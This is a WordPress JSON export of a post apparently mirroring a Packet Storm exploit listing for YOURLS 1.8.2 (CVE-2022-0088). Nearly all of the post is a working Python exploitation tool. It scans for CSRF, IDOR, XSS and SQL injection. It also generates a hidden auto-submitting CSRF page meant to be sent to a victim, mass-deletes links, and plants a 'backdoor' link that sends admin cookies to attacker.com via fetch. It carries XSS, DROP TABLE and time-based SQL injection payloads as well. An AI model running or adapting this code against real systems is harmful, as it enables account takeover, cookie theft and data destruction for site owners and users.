{"id":29324,"date":"2025-12-08T10:42:41","date_gmt":"2025-12-08T10:42:41","guid":{"rendered":"http:\/\/localhost\/?p=29324"},"modified":"2025-12-08T10:42:41","modified_gmt":"2025-12-08T10:42:41","slug":"yourls-182-csrf-idor-missing-authorization","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29324","title":{"rendered":"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540"},"content":{"rendered":"

{“lastseen”:”2025-12-08T16:29:00″,”description”:”YOURLS version 1.8.2 AJAX endpoint scanner that checks for cross site request forgery, insecure direct object reference, missing authorization, and missing input validation vulnerabilities…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization”,”source”:””,”references”:””,”id”:”PACKETSTORM:212540″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-0088″],”sourceData”:”=============================================================================================================================================\\n | # Title : YOURLS 1.8.2 AJAX Endpoint Vulnerabilities |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/yourls\/yourls\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212395\/ \\u0026 \\tCVE-2022-0088\\n \\n [+] Summary : Critical security vulnerabilities in YOURLS \/admin\/ajax.php endpoint that allow attackers \\n to perform unauthorized actions, access other users’ data, and potentially compromise the entire system.\\n \\t\\t\\t \\n [+] Vulnerabilities: CSRF, IDOR, Missing Authorization, Missing Input Validation\\t\\t\\t \\n \\t\\t\\t \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Author: indoushka\\n \\”\\”\\”\\n \\n import requests\\n import json\\n import sys\\n import argparse\\n import hashlib\\n import re\\n from urllib.parse import urljoin\\n from colorama import Fore, Style, init\\n \\n # Initialize colorama\\n init(autoreset=True)\\n \\n class YOURLS_Exploiter:\\n def __init__(self, target_url, session_cookie=None, csrf_token=None):\\n self.base_url = target_url.rstrip(‘\/’)\\n self.ajax_url = urljoin(self.base_url, ‘admin\/ajax.php’)\\n self.session = requests.Session()\\n \\n if session_cookie:\\n self.session.headers.update({‘Cookie’: session_cookie})\\n \\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Accept’: ‘application\/json, text\/javascript, *\/*; q=0.01’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded; charset=UTF-8’,\\n ‘X-Requested-With’: ‘XMLHttpRequest’,\\n ‘Referer’: urljoin(self.base_url, ‘admin\/’)\\n })\\n \\n self.csrf_token = csrf_token\\n self.vulnerabilities = []\\n \\n def print_banner(self):\\n banner = f\\”\\”\\”\\n {Fore.RED}\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 YOURLS AJAX Endpoint Unified Exploitation Tool \u2551\\n \u2551 Multiple Vulnerabilities Exploiter \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d{Style.RESET_ALL}\\n \\”\\”\\”\\n print(banner)\\n \\n def detect_vulnerabilities(self):\\n \\”\\”\\”Detect all potential vulnerabilities\\”\\”\\”\\n print(f\\”{Fore.CYAN}[*] Scanning for vulnerabilities…{Style.RESET_ALL}\\”)\\n \\n # Test 1: CSRF Vulnerability\\n self.test_csrf()\\n \\n # Test 2: IDOR Vulnerability\\n self.test_idor()\\n \\n # Test 3: Missing Input Validation\\n self.test_input_validation()\\n \\n # Test 4: Information Disclosure\\n self.test_info_disclosure()\\n \\n # Test 5: SQL Injection\\n self.test_sql_injection()\\n \\n # Print summary\\n self.print_summary()\\n \\n def test_csrf(self):\\n \\”\\”\\”Test for CSRF vulnerability\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}[+] Testing CSRF Protection…{Style.RESET_ALL}\\”)\\n \\n # Try to make a request without CSRF token\\n test_data = {\\n ‘action’: ‘add’,\\n ‘url’: ‘http:\/\/test.com’,\\n ‘keyword’: ‘test123’,\\n ‘nonce’: ‘dummy_nonce’\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=10)\\n \\n if response.status_code == 200:\\n try:\\n resp_json = response.json()\\n if ‘status’ in resp_json and resp_json[‘status’] == ‘success’:\\n print(f\\”{Fore.RED}[!] CSRF VULNERABLE: Action executed without proper CSRF protection{Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘CSRF’,\\n ‘severity’: ‘High’,\\n ‘description’: ‘Actions can be performed without CSRF token validation’\\n })\\n else:\\n print(f\\”{Fore.GREEN}[-] CSRF protection appears to be working{Style.RESET_ALL}\\”)\\n except:\\n print(f\\”{Fore.YELLOW}[-] Could not parse response{Style.RESET_ALL}\\”)\\n except Exception as e:\\n print(f\\”{Fore.RED}[-] Error: {str(e)}{Style.RESET_ALL}\\”)\\n \\n def test_idor(self):\\n \\”\\”\\”Test for Insecure Direct Object Reference\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}[+] Testing IDOR Vulnerability…{Style.RESET_ALL}\\”)\\n \\n # First, create a link to get a valid ID\\n print(f\\” Step 1: Creating test link…\\”)\\n \\n create_data = {\\n ‘action’: ‘add’,\\n ‘url’: ‘http:\/\/victim-test.com’,\\n ‘keyword’: ‘victimlink’,\\n ‘nonce’: self.get_nonce(‘add_url’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=create_data, timeout=10)\\n \\n if response.status_code == 200:\\n # Try to access other IDs\\n print(f\\” Step 2: Attempting IDOR enumeration…\\”)\\n \\n for link_id in range(1, 11):\\n test_data = {\\n ‘action’: ‘delete’,\\n ‘id’: link_id,\\n ‘keyword’: f’test{link_id}’,\\n ‘nonce’: self.get_nonce(f’delete-link_{link_id}’)\\n }\\n \\n response = self.session.post(self.ajax_url, data=test_data, timeout=5)\\n \\n if response.status_code == 200:\\n try:\\n resp_json = response.json()\\n if ‘success’ in resp_json and resp_json[‘success’]:\\n print(f\\”{Fore.RED}[!] IDOR VULNERABLE: Can delete link ID {link_id}{Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘IDOR’,\\n ‘severity’: ‘High’,\\n ‘description’: f’Can access\/delete link ID {link_id} without ownership verification’\\n })\\n break\\n except:\\n pass\\n except Exception as e:\\n print(f\\”{Fore.RED}[-] Error: {str(e)}{Style.RESET_ALL}\\”)\\n \\n def test_input_validation(self):\\n \\”\\”\\”Test for missing input validation\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}[+] Testing Input Validation…{Style.RESET_ALL}\\”)\\n \\n # Test XSS in URL field\\n xss_payloads = [\\n ‘javascript:alert(document.cookie)’,\\n ‘data:text\/html,\\u003cscript\\u003ealert(1)\\u003c\/script\\u003e’,\\n ‘\\” onmouseover=\\”alert(1)\\”‘,\\n ‘\\u003csvg onload=alert(1)\\u003e’\\n ]\\n \\n for payload in xss_payloads:\\n test_data = {\\n ‘action’: ‘add’,\\n ‘url’: payload,\\n ‘keyword’: f’xss{hashlib.md5(payload.encode()).hexdigest()[:6]}’,\\n ‘nonce’: self.get_nonce(‘add_url’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=5)\\n \\n if response.status_code == 200:\\n resp_text = response.text.lower()\\n if ‘alert’ in resp_text or ‘script’ in resp_text:\\n print(f\\”{Fore.RED}[!] XSS VULNERABLE: Payload accepted – {payload[:30]}…{Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘XSS’,\\n ‘severity’: ‘Medium’,\\n ‘description’: f’XSS payload accepted: {payload[:50]}’\\n })\\n break\\n except:\\n pass\\n \\n # Test SQL Injection\\n sql_payloads = [\\n \\”‘ OR ‘1’=’1\\”,\\n \\”test’; DROP TABLE yourls_url; –\\”,\\n \\”1′ UNION SELECT 1,2,3,4 –\\”\\n ]\\n \\n for payload in sql_payloads:\\n test_data = {\\n ‘action’: ‘add’,\\n ‘url’: f’http:\/\/{payload}.com’,\\n ‘keyword’: f’sql{hashlib.md5(payload.encode()).hexdigest()[:6]}’,\\n ‘nonce’: self.get_nonce(‘add_url’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=5)\\n \\n if ‘sql’ in response.text.lower() or ‘union’ in response.text.lower():\\n print(f\\”{Fore.RED}[!] SQL INJECTION POSSIBLE: Payload triggered response{Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘SQL Injection’,\\n ‘severity’: ‘Critical’,\\n ‘description’: f’SQL payload may be injectable: {payload[:50]}’\\n })\\n break\\n except:\\n pass\\n \\n def test_info_disclosure(self):\\n \\”\\”\\”Test for information disclosure\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}[+] Testing Information Disclosure…{Style.RESET_ALL}\\”)\\n \\n # Try to access error messages\\n test_data = {\\n ‘action’: ‘invalid_action’,\\n ‘nonce’: ‘invalid_nonce’\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=5)\\n \\n if response.status_code == 200:\\n # Look for error messages that reveal information\\n error_indicators = [\\n ‘mysql’, ‘database’, ‘sql’, ‘query failed’,\\n ‘on line’, ‘stack trace’, ‘fatal error’,\\n ‘warning:’, ‘notice:’, ‘undefined’\\n ]\\n \\n for indicator in error_indicators:\\n if indicator in response.text.lower():\\n print(f\\”{Fore.RED}[!] INFO DISCLOSURE: {indicator} found in response{Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘Information Disclosure’,\\n ‘severity’: ‘Low’,\\n ‘description’: f’Sensitive information disclosed: {indicator}’\\n })\\n break\\n except Exception as e:\\n pass\\n \\n def test_sql_injection(self):\\n \\”\\”\\”Test for SQL injection vulnerabilities\\”\\”\\”\\n print(f\\”\\\\n{Fore.YELLOW}[+] Testing SQL Injection…{Style.RESET_ALL}\\”)\\n \\n # Time-based SQL injection test\\n time_payloads = [\\n (\\”‘ OR SLEEP(5) –\\”, \\”MySQL sleep\\”),\\n (\\”‘; WAITFOR DELAY ’00:00:05’ –\\”, \\”MSSQL delay\\”),\\n (\\”‘ AND 1=IF(1=1,SLEEP(5),0) –\\”, \\”Conditional sleep\\”)\\n ]\\n \\n for payload, description in time_payloads:\\n test_data = {\\n ‘action’: ‘add’,\\n ‘url’: f’http:\/\/test{payload}.com’,\\n ‘keyword’: f’time{hashlib.md5(payload.encode()).hexdigest()[:6]}’,\\n ‘nonce’: self.get_nonce(‘add_url’)\\n }\\n \\n try:\\n import time\\n start_time = time.time()\\n response = self.session.post(self.ajax_url, data=test_data, timeout=10)\\n end_time = time.time()\\n \\n if end_time – start_time \\u003e 4:\\n print(f\\”{Fore.RED}[!] BLIND SQL INJECTION: Time-based delay detected ({description}){Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘Blind SQL Injection’,\\n ‘severity’: ‘Critical’,\\n ‘description’: f’Time-based SQLi: {description}’\\n })\\n break\\n except requests.exceptions.Timeout:\\n print(f\\”{Fore.RED}[!] BLIND SQL INJECTION: Request timeout ({description}){Style.RESET_ALL}\\”)\\n self.vulnerabilities.append({\\n ‘name’: ‘Blind SQL Injection’,\\n ‘severity’: ‘Critical’,\\n ‘description’: f’Timeout on: {description}’\\n })\\n break\\n except:\\n pass\\n \\n def get_nonce(self, action):\\n \\”\\”\\”Extract or generate nonce\\”\\”\\”\\n if self.csrf_token:\\n return self.csrf_token\\n \\n # Try to extract nonce from admin page\\n try:\\n admin_url = urljoin(self.base_url, ‘admin\/’)\\n response = self.session.get(admin_url, timeout=5)\\n \\n # Look for nonce in HTML\\n nonce_patterns = [\\n r’name=\\”nonce\\” value=\\”([^\\”]+)\\”‘,\\n r’nonce=([a-f0-9]+)’,\\n r’nonce:[\\\\’\\”]([a-f0-9]+)[\\\\’\\”]’\\n ]\\n \\n for pattern in nonce_patterns:\\n matches = re.search(pattern, response.text, re.IGNORECASE)\\n if matches:\\n return matches.group(1)\\n except:\\n pass\\n \\n # Return dummy nonce for testing\\n return ‘test_nonce_123’\\n \\n def print_summary(self):\\n \\”\\”\\”Print vulnerability summary\\”\\”\\”\\n print(f\\”\\\\n{Fore.CYAN}{‘=’*60}{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.CYAN}[*] VULNERABILITY SUMMARY{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.CYAN}{‘=’*60}{Style.RESET_ALL}\\”)\\n \\n if not self.vulnerabilities:\\n print(f\\”{Fore.GREEN}[+] No vulnerabilities detected{Style.RESET_ALL}\\”)\\n return\\n \\n for i, vuln in enumerate(self.vulnerabilities, 1):\\n color = Fore.RED if vuln[‘severity’] in [‘High’, ‘Critical’] else Fore.YELLOW\\n print(f\\”{color}[{i}] {vuln[‘name’]} ({vuln[‘severity’]}){Style.RESET_ALL}\\”)\\n print(f\\” {vuln[‘description’]}\\”)\\n \\n def exploit_csrf(self, target_url, malicious_url, keyword):\\n \\”\\”\\”Generate CSRF exploit\\”\\”\\”\\n print(f\\”\\\\n{Fore.RED}[*] Generating CSRF Exploit…{Style.RESET_ALL}\\”)\\n \\n exploit_html = f\\”\\”\\”\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eYOURLS CSRF Exploit\\u003c\/title\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch1\\u003eCSRF Attack – YOURLS Link Addition\\u003c\/h1\\u003e\\n \\n \\u003cform id=\\”csrfForm\\” action=\\”{self.ajax_url}\\” method=\\”POST\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”action\\” value=\\”add\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”url\\” value=\\”{malicious_url}\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”keyword\\” value=\\”{keyword}\\”\\u003e\\n \\u003cinput type=\\”hidden\\” name=\\”nonce\\” value=\\”{self.get_nonce(‘add_url’)}\\”\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cscript\\u003e\\n \/\/ Auto-submit the form\\n document.getElementById(‘csrfForm’).submit();\\n \\n \/\/ Alternative: Iframe injection\\n function stealthSubmit() {{\\n var iframe = document.createElement(‘iframe’);\\n iframe.style.display = ‘none’;\\n iframe.name = ‘csrfFrame’;\\n document.body.appendChild(iframe);\\n \\n var form = document.getElementById(‘csrfForm’);\\n form.target = ‘csrfFrame’;\\n form.submit();\\n }}\\n \\n \/\/ Uncomment for stealth mode\\n \/\/ window.onload = stealthSubmit;\\n \\u003c\/script\\u003e\\n \\n \\u003cp\\u003eIf the form doesn’t auto-submit, \\u003ca href=\\”#\\” onclick=\\”document.getElementById(‘csrfForm’).submit(); return false;\\”\\u003eclick here\\u003c\/a\\u003e.\\u003c\/p\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e\\”\\”\\”\\n \\n filename = f\\”csrf_exploit_{keyword}.html\\”\\n with open(filename, ‘w’) as f:\\n f.write(exploit_html)\\n \\n print(f\\”{Fore.GREEN}[+] CSRF exploit saved to: {filename}{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.YELLOW}[*] Send this file to victim while they’re logged into YOURLS{Style.RESET_ALL}\\”)\\n \\n return filename\\n \\n def exploit_idor(self, start_id=1, end_id=100):\\n \\”\\”\\”Exploit IDOR vulnerability to enumerate links\\”\\”\\”\\n print(f\\”\\\\n{Fore.RED}[*] Exploiting IDOR Vulnerability…{Style.RESET_ALL}\\”)\\n \\n found_links = []\\n \\n for link_id in range(start_id, end_id + 1):\\n # Try to edit display\\n test_data = {\\n ‘action’: ‘edit_display’,\\n ‘id’: link_id,\\n ‘keyword’: f’test{link_id}’,\\n ‘nonce’: self.get_nonce(f’edit-link_{link_id}’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=5)\\n \\n if response.status_code == 200:\\n try:\\n resp_json = response.json()\\n if ‘html’ in resp_json and ‘keyword’ in resp_json[‘html’].lower():\\n print(f\\”{Fore.GREEN}[+] Found link ID {link_id}{Style.RESET_ALL}\\”)\\n found_links.append({\\n ‘id’: link_id,\\n ‘html’: resp_json[‘html’][:100]\\n })\\n except:\\n if ‘keyword’ in response.text.lower() or ‘url’ in response.text.lower():\\n print(f\\”{Fore.GREEN}[+] Possible link ID {link_id}{Style.RESET_ALL}\\”)\\n found_links.append({\\n ‘id’: link_id,\\n ‘response’: response.text[:100]\\n })\\n except:\\n pass\\n \\n if found_links:\\n print(f\\”\\\\n{Fore.GREEN}[+] Found {len(found_links)} accessible links{Style.RESET_ALL}\\”)\\n for link in found_links:\\n print(f\\” ID {link[‘id’]}: {link.get(‘html’, link.get(‘response’, ‘No data’))}\\”)\\n \\n return found_links\\n \\n def mass_link_deletion(self, start_id=1, end_id=50):\\n \\”\\”\\”Mass deletion via IDOR\\”\\”\\”\\n print(f\\”\\\\n{Fore.RED}[*] Attempting Mass Link Deletion…{Style.RESET_ALL}\\”)\\n \\n deleted = []\\n \\n for link_id in range(start_id, end_id + 1):\\n test_data = {\\n ‘action’: ‘delete’,\\n ‘id’: link_id,\\n ‘keyword’: f’del{link_id}’,\\n ‘nonce’: self.get_nonce(f’delete-link_{link_id}’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=test_data, timeout=3)\\n \\n if response.status_code == 200:\\n try:\\n resp_json = response.json()\\n if ‘success’ in resp_json and resp_json[‘success’]:\\n print(f\\”{Fore.RED}[!] Deleted link ID {link_id}{Style.RESET_ALL}\\”)\\n deleted.append(link_id)\\n except:\\n if ‘success’ in response.text.lower():\\n print(f\\”{Fore.RED}[!] Possibly deleted link ID {link_id}{Style.RESET_ALL}\\”)\\n deleted.append(link_id)\\n except:\\n pass\\n \\n return deleted\\n \\n def create_backdoor(self):\\n \\”\\”\\”Create persistent backdoor via XSS or malicious link\\”\\”\\”\\n print(f\\”\\\\n{Fore.RED}[*] Creating Persistent Backdoor…{Style.RESET_ALL}\\”)\\n \\n # Create malicious shortened link with XSS\\n xss_payload = \\”javascript:fetch(‘https:\/\/attacker.com\/steal?cookie=’+document.cookie)\\”\\n \\n backdoor_data = {\\n ‘action’: ‘add’,\\n ‘url’: xss_payload,\\n ‘keyword’: ‘admin-panel’,\\n ‘nonce’: self.get_nonce(‘add_url’)\\n }\\n \\n try:\\n response = self.session.post(self.ajax_url, data=backdoor_data, timeout=10)\\n \\n if response.status_code == 200:\\n print(f\\”{Fore.GREEN}[+] Backdoor link created: {self.base_url}\/admin-panel{Style.RESET_ALL}\\”)\\n print(f\\”{Fore.YELLOW}[*] When admin visits this link, cookies will be sent to attacker{Style.RESET_ALL}\\”)\\n except Exception as e:\\n print(f\\”{Fore.RED}[-] Failed to create backdoor: {str(e)}{Style.RESET_ALL}\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=\\”YOURLS AJAX Endpoint Exploitation Tool\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter\\n )\\n \\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, help=\\”Target YOURLS base URL\\”)\\n parser.add_argument(\\”-c\\”, \\”–cookie\\”, help=\\”Session cookie (e.g., PHPSESSID=abc123)\\”)\\n parser.add_argument(\\”-t\\”, \\”–token\\”, help=\\”CSRF\/nonce token\\”)\\n parser.add_argument(\\”-s\\”, \\”–scan\\”, action=\\”store_true\\”, help=\\”Scan for vulnerabilities\\”)\\n parser.add_argument(\\”-x\\”, \\”–exploit\\”, choices=[‘csrf’, ‘idor’, ‘mass’, ‘backdoor’], help=\\”Exploit specific vulnerability\\”)\\n parser.add_argument(\\”–csrf-url\\”, help=\\”URL for CSRF exploit (with –exploit csrf)\\”)\\n parser.add_argument(\\”–keyword\\”, help=\\”Custom keyword for links\\”)\\n parser.add_argument(\\”–start-id\\”, type=int, default=1, help=\\”Start ID for IDOR enumeration\\”)\\n parser.add_argument(\\”–end-id\\”, type=int, default=50, help=\\”End ID for IDOR enumeration\\”)\\n \\n args = parser.parse_args()\\n \\n if not args.scan and not args.exploit:\\n print(f\\”{Fore.RED}[-] Please specify –scan or –exploit{Style.RESET_ALL}\\”)\\n return\\n \\n # Initialize exploiter\\n exploiter = YOURLS_Exploiter(args.url, args.cookie, args.token)\\n exploiter.print_banner()\\n \\n if args.scan:\\n exploiter.detect_vulnerabilities()\\n \\n if args.exploit:\\n if args.exploit == ‘csrf’:\\n if not args.csrf_url:\\n print(f\\”{Fore.RED}[-] Please specify –csrf-url for CSRF exploit{Style.RESET_ALL}\\”)\\n return\\n \\n keyword = args.keyword or f\\”mal_{hashlib.md5(args.csrf_url.encode()).hexdigest()[:8]}\\”\\n exploiter.exploit_csrf(args.url, args.csrf_url, keyword)\\n \\n elif args.exploit == ‘idor’:\\n found = exploiter.exploit_idor(args.start_id, args.end_id)\\n if found:\\n print(f\\”\\\\n{Fore.GREEN}[+] IDOR exploitation complete{Style.RESET_ALL}\\”)\\n \\n elif args.exploit == ‘mass’:\\n confirm = input(f\\”{Fore.RED}[!] This will attempt to delete multiple links. Continue? (y\/n): {Style.RESET_ALL}\\”)\\n if confirm.lower() == ‘y’:\\n deleted = exploiter.mass_link_deletion(args.start_id, args.end_id)\\n print(f\\”\\\\n{Fore.RED}[!] Attempted to delete {len(deleted)} links{Style.RESET_ALL}\\”)\\n \\n elif args.exploit == ‘backdoor’:\\n exploiter.create_backdoor()\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212540″,”cvss”:{“score”:7.4,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:N\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:L\/I:N\/A:N”,”baseScore”:3.5,”baseSeverity”:”LOW”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”LOW”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”LOW”,”integrityImpact”:”NONE”,”availabilityImpact”:”NONE”}},”href”:”https:\/\/packetstorm.news\/files\/id\/212540\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-08T16:29:00″,”description”:”YOURLS version 1.8.2 AJAX endpoint scanner that checks for cross site request forgery, insecure direct object reference, missing authorization, and missing input validation vulnerabilities…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 YOURLS…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,29,12,15,13,53,7,11,5],"class_list":["post-29324","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-74","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29324\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 YOURLS 1.8.2 CSRF \/ IDOR \/ Missing Authorization_PACKETSTORM:212540 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-08T16:29:00″,”description”:”YOURLS version 1.8.2 AJAX endpoint scanner that checks for cross site request forgery, insecure direct object reference, missing authorization, and missing input validation vulnerabilities…”,”published”:”2025-12-08T00:00:00″,”modified”:”2025-12-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 YOURLS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29324\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-08T10:42:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 YOURLS 1.8.2 CSRF \\\/ IDOR \\\/ Missing Authorization_PACKETSTORM:212540\",\"datePublished\":\"2025-12-08T10:42:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324\"},\"wordCount\":3061,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.4\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29324#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324\",\"name\":\"\ud83d\udcc4 YOURLS 1.8.2 CSRF \\\/ IDOR \\\/ Missing Authorization_PACKETSTORM:212540 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-08T10:42:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29324\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29324#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 YOURLS 1.8.2 CSRF \\\/ IDOR \\\/ Missing Authorization_PACKETSTORM:212540\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 